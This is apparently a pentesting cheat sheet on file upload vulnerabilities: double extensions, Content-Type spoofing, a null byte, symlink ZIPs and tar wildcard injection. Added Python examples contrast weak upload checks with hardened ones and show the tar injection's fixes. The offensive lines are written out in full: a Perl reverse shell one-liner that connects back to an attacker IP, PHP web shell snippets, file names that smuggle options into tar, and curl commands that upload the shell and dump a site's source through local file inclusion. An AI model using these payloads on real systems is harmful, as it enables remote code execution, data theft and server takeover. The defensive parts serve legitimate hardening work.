File Upload

File upload vulnerabilities are well known and fairly old PHP-era issues, but the bypasses below still work on some targets

Double Extension

# If the target only checks that an allowed extension appears somewhere in the name, or the web server
# picks the handler from the first extension it recognises (Apache with AddHandler does this)
→ exploit.php.jpg


# Classic: rewrite the Content-Type of the file part in the multipart body, for example with Burp
Content-Type: application/x-php → Content-Type: image/gif

# Using cURL
curl -i -F "file=@shell.php;type=image/gif" --cookie "..." "<target>"

# On Windows the client itself can be made to send the spoofed type: create or update the following registry key

# then add a "String" value named "Content Type" (the name Windows uses for its file-type MIME mappings) and set it to "image/gif"

Null Byte

# Only on old PHP (< 5.3.4): the extension check sees ".jpg", but the C-string filesystem call stops at the NUL and writes exploit.php
→ exploit.php%00.jpg
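The three tricks above all target the same class of weak server-side check. The following is an added example (not code from the original page): a Python model of the weak check beside a hardened one, with constructed sample names and bytes, so you can see exactly which inputs each accepts. Function names, the NUL-truncation model and the sample data are assumptions for the demo.

```python
"""Upload checks the tricks above rely on (weak) beside a hardened version.

Added example, not code from the original page. Sample file names and bytes
below are constructed for the demo; function names are my own.
"""
import posixpath
import re
import secrets
from typing import Optional

# magic bytes for the image types we allow
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

# constructed sample uploads
PHP_SHELL = b"<?php system($_GET['c']); ?>"
REAL_GIF = b"GIF89a" + b"\x00" * 10


def weak_accepts(filename: str, content_type: str) -> bool:
    """Typical broken check: an allowed extension anywhere in the name and a
    client-supplied Content-Type that starts with image/. The file body is
    never looked at."""
    ext_ok = any("." + ext in filename.lower() for ext in MAGIC)  # "exploit.php.jpg" passes
    type_ok = content_type.lower().startswith("image/")           # attacker controls this header
    return ext_ok and type_ok


def stored_path_old_php(upload_dir: str, filename: str) -> str:
    """Path a NUL-truncating runtime (PHP < 5.3.4) actually writes: the C
    string stops at the first \\x00, so "exploit.php\\x00.jpg" lands as
    exploit.php even though the check above saw ".jpg"."""
    return posixpath.join(upload_dir, filename.split("\x00", 1)[0])


# hardened: whole name allow-listed, exactly one extension, no control chars
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(jpg|png|gif)", re.IGNORECASE)


def hardened_store_name(filename: str, data: bytes) -> Optional[str]:
    """Return the server-side name to store under, or None to reject.

    - ignores the client Content-Type entirely
    - drops any client-supplied directory part
    - allow-lists the full name, so double extensions and NUL bytes fail
    - checks magic bytes against the (single) extension
    - stores under a random name, so the original name never reaches disk
    """
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not SAFE_NAME.fullmatch(base):
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if not data.startswith(MAGIC[ext]):
        return None
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    print(weak_accepts("exploit.php.jpg", "image/gif"))                   # True (double extension)
    print(stored_path_old_php("/var/www/upload", "exploit.php\x00.jpg"))  # /var/www/upload/exploit.php
    print(hardened_store_name("exploit.php.jpg", PHP_SHELL))              # None
    print(hardened_store_name("exploit.php\x00.jpg", REAL_GIF))           # None
    print(hardened_store_name("../../cat.gif", REAL_GIF))                 # <32 hex chars>.gif
```

The hardened version never consults the client Content-Type at all; the random server-side name is what makes the double-extension and NUL tricks irrelevant even if a later check is buggy.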

ZIP Upload

# You can read files you cannot reach directly if the server unzips uploads (unzip recreates symlinks) and then serves the result
ln -s ../../../index.php link
zip --symlinks link.zip link
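What the commands above put in the archive, and how a server can spot it before extracting, as an added example (not code from the original page). It builds the symlink entry with the standard library only; entry names and targets are constructed for the demo, and the function names are my own.

```python
"""Build the symlink ZIP the commands above describe and spot it server-side.

Added example, not from the original page. Uses only the standard library;
entry names and targets are constructed for the demo.
"""
import io
import stat
import zipfile
from typing import Dict, List


def build_symlink_zip(link_name: str, target: str) -> bytes:
    """Equivalent of `ln -s <target> <link_name>; zip --symlinks out.zip <link_name>`:
    a ZIP entry whose Unix mode bits say "symlink" and whose data is the link target."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3                               # "Unix", so unzip honours the mode
        info.external_attr = (stat.S_IFLNK | 0o777) << 16    # lrwxrwxrwx
        zf.writestr(info, target)
    return buf.getvalue()


def build_plain_zip(files: Dict[str, bytes]) -> bytes:
    """Ordinary archive of regular files, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes) -> List[str]:
    """Entries an upload handler must refuse before calling unzip (which does
    recreate symlinks): symlink entries and names that escape the target dir."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16          # Unix mode lives in the high 16 bits
            parts = info.filename.split("/")
            escapes = info.filename.startswith("/") or ".." in parts
            if stat.S_ISLNK(mode) or escapes:
                bad.append(info.filename)
    return bad


if __name__ == "__main__":
    evil = build_symlink_zip("link", "../../../index.php")
    print(unsafe_entries(evil))                                  # ['link']
    print(unsafe_entries(build_plain_zip({"a.txt": b"hi"})))     # []
```

Note that Python's own `ZipFile.extractall` writes a symlink entry as a plain file containing the target text; it is the system `unzip` on the server that turns the entry into a real link, which is why the check has to happen on the archive metadata rather than on the extracted tree.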

Wildcard & tar exploit

# If the server runs tar with a wildcard (*) over the upload directory (e.g. tar cf backup.tar *), the shell expands the
# file names into tar's argument list and GNU tar parses names starting with "--" as options. Upload 3 files :
• --checkpoint-action=exec=sh <script>   (a file whose name is this option; <script> is the third file below)
• --checkpoint=1
• <script>, the shell script tar will run as "sh <script>" (any name you like)

# the script contains a payload (different exploits are possible) :
• cat "path/index.php" > index.txt
• #!/bin/sh
  perl -e 'use Socket;$i="";$p=15975;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  # reverse shell: set $i to the attacker IP and listen on port 15975
• tar cvf admin.tar ../../../admin
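The injection above reproduced locally, as an added example (not code from the original page): it seeds a temporary upload directory with the three files, runs the vulnerable backup command, and shows the two standard fixes (`./*` and `--`) next to it. It assumes GNU tar and a POSIX sh on PATH; the marker script stands in for the real payload and the function names are my own.

```python
"""Reproduce the tar wildcard injection locally and show the fix.

Added example, not from the original page. Assumes GNU tar (the
--checkpoint options are GNU extensions) and a POSIX sh on PATH.
"""
import os
import subprocess
import tempfile
from typing import Dict


def gnu_tar_available() -> bool:
    """True when the tar on PATH is GNU tar (busybox/bsdtar lack --checkpoint)."""
    try:
        out = subprocess.run(["tar", "--version"], capture_output=True, text=True)
    except FileNotFoundError:
        return False
    return "GNU tar" in out.stdout


def seed_uploads(upload_dir: str, marker: str) -> None:
    """Drop the three 'uploads': two option-named files and the script they run."""
    # the script the checkpoint action executes; here it only leaves a marker
    with open(os.path.join(upload_dir, "shell.sh"), "w") as f:
        f.write("#!/bin/sh\ntouch '%s'\n" % marker)
    # file names that tar parses as options once the shell has expanded '*'
    open(os.path.join(upload_dir, "--checkpoint=1"), "w").close()
    open(os.path.join(upload_dir, "--checkpoint-action=exec=sh shell.sh"), "w").close()
    # an innocent upload so the archive has real content too (constructed)
    with open(os.path.join(upload_dir, "photo.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n")


def run_backup(glob_form: str) -> bool:
    """Run `tar cf ../backup.tar <glob_form>` inside a fresh upload dir and
    report whether the uploaded script got executed (marker file appeared)."""
    with tempfile.TemporaryDirectory() as tmp:
        upload_dir = os.path.join(tmp, "upload")
        os.mkdir(upload_dir)
        marker = os.path.join(tmp, "pwned")
        seed_uploads(upload_dir, marker)
        # the shell, not tar, expands the glob: that is what turns names into options
        subprocess.run(["sh", "-c", "tar cf ../backup.tar " + glob_form],
                       cwd=upload_dir, capture_output=True)
        return os.path.exists(marker)


def demo() -> Dict[str, bool]:
    return {
        "vulnerable (*)": run_backup("*"),     # file names become tar options
        "fixed (./*)": run_backup("./*"),      # every name now starts with ./, never with -
        "fixed (-- *)": run_backup("-- *"),    # -- ends option parsing before the names
    }


if __name__ == "__main__":
    if not gnu_tar_available():
        raise SystemExit("needs GNU tar")
    for form, executed in demo().items():
        print(f"{form}: script executed = {executed}")
```

Any tool that takes options and file names in the same argument list is affected the same way (chown, rsync, and so on); the `./*` or `--` fix is generic, and restricting which characters an uploaded file name may start with removes the problem at the source.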


# Using the uploaded file through an LFI: the "page" parameter includes ../upload/<file>.png, which here is assumed to contain
# <?php $_GET[0]($_POST[1]); ?>, so 0=readfile with 1=index.php calls readfile("index.php") and dumps the source into res
curl -X POST "http://xxx?page=../upload/ucdn6sCjDxredw1.png&0=readfile" --cookie "<cookie>" -d "1=index.php" --output res